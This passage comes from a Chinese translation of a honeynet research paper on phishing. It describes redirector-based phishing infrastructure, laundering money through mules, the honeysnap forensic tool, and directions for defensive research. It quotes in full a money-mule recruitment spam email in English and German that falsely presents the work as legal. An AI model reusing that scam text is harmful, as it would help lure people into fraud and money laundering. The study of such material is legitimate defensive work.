如果中央的釣魚網站服務器被檢測到，這個系統將被離線，但釣魚者可以在一臺新攻陷的主機上重新架設釣魚網站，并重新矯正原先的 redir 主機重定向流量到代替的中央網站服務器。使用這種技術，整個網絡可以很快地重新恢復可用，網絡釣魚攻擊可以快速地重新開始。

一臺 redir 主機可以非常靈活，因為它可以通過非常簡單地重新配置指向另外一個釣魚網站。這也減少了從初始的系統攻陷到釣魚網站可用的這段時間，從而增加了網絡釣魚攻擊可以進行的時間長度。

使用這樣的組合攻擊技術又一次驗證了攻擊者的高組織性和能力，而不僅僅是簡單的腳本小子。類似的運行模型也經常被主流的網站服務提供商和超大容量數據內容提供商（如 Google ）所運用。

進一步的發現：資金轉賬

我們的研究同時也關注釣魚者如何使用捕獲的銀行賬號信息（如一個與相關的交易代號聯系在一起的銀行賬號）。因為大多數銀行都對跨國的資金流通進行監控，釣魚者并不能簡單地不引起金融權威機構注意下，從一個國家轉移一大筆資金到另外一個國家。釣魚者于是使用一些中介來為他們轉移資金－以兩階段的步驟，釣魚者先從受害者銀行賬號中把錢轉移到一個同國中介人的銀行賬號中，中介人然后從他們的銀行賬號中提出現金（留下一定百分比作為他們的提供此轉賬服務的報酬）并寄給釣魚者，如通過普通的地面信件。當然，這些中介人可能被捕，但是由于釣魚者的錢已經在傳輸途中，他們并不會面對太大的安全風險，同時也可以很容易地轉移他們的資金流通渠道到另外的中介人。一個可以說明在網絡釣魚攻擊背后的金融結構的電子郵件實例如下：

Hello!
We finding Europe persons, who can Send/Receive bank wires
from our sellings, from our European clients. To not pay
TAXES from international transfers in Russia . We offer 10%
percent from amount u receive and pay all fees, for sending
funds back.Amount from 1000 euro per day. All this activity
are legal in Europe .
Fill this form: http://XXX.info/index.php (before filling
install yahoo! messenger please or msn), you will recieve
full details very quickly.
_________________________________________________________

Wir, europ?ische Personen findend, die Bankleitungen
davon Senden/erhalten k?nnen unsere Verk?ufe, von
unseren Kunden von Deutschland. STEUERN von internationalen
übertragungen in Russland nicht zu bezahlen. Wir
erh?lt das Prozent des Angebots 10 % vom Betrag und
bezahlt alle Schulgelder, um Kapital zurück zu senden.
Betrag von 1000 Euro pro Tag. Diese ganze T?tigkeit
ist in Europa gesetzlich.
Füllen Sie diese Form: http://XXX.info/index.php (bevor
die Füllung Yahoo installiert! Bote bitte oder msn), Sie
recieve volle Details sehr.

Thank you, FINANCIE LTD.

這是一封從英文到德文的非常爛的翻譯稿，可能是通過翻譯軟件自動產生的，這也說明攻擊者并不是以英語為母語的。因為錢將會被轉移到俄羅斯，所以攻擊者很可能來自這個國家。資金轉移行為也正隨著網絡釣魚攻擊越來越具組織性變得越來越普遍。#p#副標題#e#

Honeysnap – 一個攻擊案例分析助手

一個從我們開始分析被上述網絡釣魚攻擊攻陷的蜜罐數據時立即得到的一個結論是：由于不同黑客組織同時進行的多個攻擊，我們需要非常多的時間從網絡的流量中去抽取和準備用于進一步詳細分析的數據。這個數據抽取過程是重復性的且枯燥乏味的，如果由人工進行將會使得我們寶貴的分析時間的效率大打折扣。因此需要一個自動化的解決方案。

由英國蜜罐項目組 David Watson 編寫的 honeysnap 腳本正是基于此目的，被設計用來對蜜網日常捕獲的數據為輸入產生出一個簡單的摘要輸出，用于指導進一步的人工分析。 honeysnap 腳本對每個蜜罐的數據進行分類，提供了連出的 HTTP 和 FTP GETs 請求、 IRC 消息和 Sebek 鍵擊記錄日志列表功能，對關鍵網絡連接能夠進行自動化的 TCP 流重組，并抽取、標識和存儲由 FTP 或 HTTP 下載的文件， honeysnap 腳本使得大多數消耗大量時間的攻擊案例準備性工作都被移除，使得分析員能夠集中精力人工地分析案例中的關鍵部分。 honeysnap 腳本還支持一個自動化的方法對包含感興趣的關鍵字（如銀行、賬號、口令等）的 IRC 通訊進行顯示，并提供日常性的 Email 報告功能。

目前的 honeysnap 腳本的一個基本的概念證明性的 UNIX shell 腳本，其 alpha 版可以在此找到，同時一組 honeysnap 輸出 示例可以在此找到。一個模塊化的并完全擴展的以 Python 編寫的版本目前正在由蜜網項目組的成員開發中，并將與 2005 年 6 月發布 beta 測試版。

進一步的研究

在本文給出的信息給出了在網絡釣魚攻擊領域進行進一步研究的一些潛在方法，我們同時建議在以下的一些方面進行更深入的調查和研究：

我們希望能夠調查蜜罐技術能否被用于幫助與垃圾郵件發送者和釣魚者進行對抗。一個可能的研究項目是部署一些在上述觀察到的網絡釣魚攻擊中所通常使用類型的蜜罐，或是一些對垃圾郵件發送者具有很強的吸引力的蜜罐（ 如 SMTP open relays ），對攻擊者對這些系統的攻擊行為進行進一步的分析，能夠幫助我們更深入地對網絡釣魚攻擊進行剖析，特別是使用僵尸網絡進行網絡釣魚這一領域，并能夠對網絡釣魚攻擊的創新進行跟蹤。另外一個研究的可能性是進一步發展蜜罐的概念，研究客戶端蜜罐技術，這種新一代的蜜罐工具能更活躍地參與到通訊網絡中，例如，自動地隨著垃圾郵件中的鏈接去訪問目標網站內容。客戶端蜜罐工具可以在 IRC 頻道中發呆或通過 P2P 網絡共享 / 下載文件，從而進一步地提高我們對這些通訊網絡中所面臨地安全威脅的了解。

另外，我們期望能夠對對付和阻止這些網絡釣魚攻擊的潛在方法進行深入研究。因為從一個網絡釣魚攻擊的開始到結束的時間周期可能只有幾個小時或幾天，同時攻擊源也可能廣泛地分布，所以這將是一個困難的任務。目前在此領域研究的工作（如 The AntiPhishing Group 和 PhishReport ）關注于依靠終端用戶收集釣魚郵件。雖然這是個可行的途徑，但它只能在網絡釣魚攻擊生命周期的最后階段進行發現。 我們更需要一個自動化地對網絡釣魚攻擊捕獲和響應的機制。

我們懷疑這些賬號和口令在黑客界會被進行交易流通，可能通過 IRC 。蜜網技術可以被用來捕獲這些通訊，并更深入地了解網絡釣魚攻擊行為。另外，網絡釣魚攻擊工具經常可以從一些經常更新地中央網站服務器或 FTP 服務器上下載獲得。盡管充滿爭議，但對這些活動可以進行監控或聯系系統擁有者以幫助他阻止這些網絡釣魚攻擊，同時我們應該建立一個體系框架，從而對這些活動進行研究，并提出潛在的對策。

需要在提高案例分析的自動化進行進一步的研究工作，特別是對在這些攻擊過程中捕獲數據的自動輪廓生成。自動的流量和 IP 地址抽取， DNS 反向查詢和 IP 地址塊擁有者查詢，針對每個 IP 地址或每個域名的流量摘要，以及被動的操作系統指紋辨識等功能在分析大規模的數據集時是非常有用的，在分析一個本地的包括已知主機、攻擊者、攻擊特征、消息內容等的取證數據庫也是同樣關鍵。在一個長期的規劃中，需要建立共享這些信息的統一標準，以及一個全球的取證分析數據庫從而支持對分布式的黑客活動進行分析，這也將是對整個互聯網社區所高度需要和有顯著意義的。

結論

本文中我們展示了一些真實世界發生的網絡釣魚攻擊的實際案例，以及在這些案例中攻擊者進行的典型的行為。所有這些提供的信息都是使用高交互性的研究型蜜罐所捕獲的，這又一次證明了蜜網技術在信息保障和取證分析領域里是一個強有力的工具。我們分析了攻擊由德國和英國蜜網研究項目組部署的蜜罐的幾次攻擊。在兩個案例中，釣魚者攻擊并攻陷了蜜罐系統，在攻陷主機后他們的動作開始有所差異。如下的網絡釣魚攻擊各階段的攻擊技術被發現：

以著名的一些組織結構為目標，架設其釣魚網站
發送欺騙性垃圾郵件，引誘受害者訪問釣魚網站
安裝重定向服務，將網站流量都轉發到已架設的釣魚網站
通過僵尸網絡傳播垃圾郵件和釣魚郵件

這些數據幫助我們了解釣魚者的典型攻擊行為和他們用來引誘和欺騙受害者的一些方法。我們已經學習到網絡釣魚攻擊可以非常快地發生，在最初的系統入侵到一個釣魚網站在線，并發出宣揚此網站的釣魚垃圾郵件只有相當有限的時間，而這么快的攻擊速度使得這些攻擊者很難被追蹤和阻止。

我們的研究同時顯示網絡釣魚攻擊正在變得越來越普遍而且具有良好的組織性。我們已經觀察到針對主要的幾個在線組織機構的預先構建的釣魚網站的歸檔，這使得釣魚者可以在很短的時間內準備好進行釣魚攻擊，這也說明了背后隱藏著一個組織良好的釣魚攻擊團體。這些釣魚內容可以通過利用端口重定向器或僵尸網絡快速地進一步擴散。與批量掃描的證據和釣魚網站內容中手動形式加入的 IP 地址，我們可以相信在一個時刻會有多個特定釣魚網站的實例同時存在，在上傳的釣魚網站構建完成之前，到達這個剛被攻陷的服務器的網頁瀏覽流量就已經被發現，而且在某個被攻陷主機上發出的釣魚垃圾郵件也有可能并不是在引誘受害者訪問發送郵件的這臺主機，這些現象都說明有良好組織性的釣魚團隊在進行分布式和并行的釣魚攻擊。

我們的研究工作顯示了垃圾郵件、僵尸網絡和網絡釣魚攻擊之間一個清晰的連接關系，以及利用中介來完成最后的隱蔽性資金轉賬。這些觀察到的現象，結合大規模的批量漏洞掃描和兩層拓撲結構的釣魚網絡，都證明了釣魚者所帶來的真實威脅，釣魚活動的組織嚴密性，以及他們所使用的相當高級的攻擊技術。隨著釣魚攻擊的技術門檻進一步增高及潛在的回報進一步增加，在未來幾年中，網絡釣魚攻擊的技術很可能進一步地發展，并且網絡釣魚攻擊的數量也將進一步增長。減少可被僵尸網絡控制的有漏洞的 PC 機，抑制數量不斷增多的垃圾郵件，防止有組織性的犯罪活動，并且教育互聯網用戶關注來自社交工程的潛在安全風險，所有這些都還充滿了挑戰。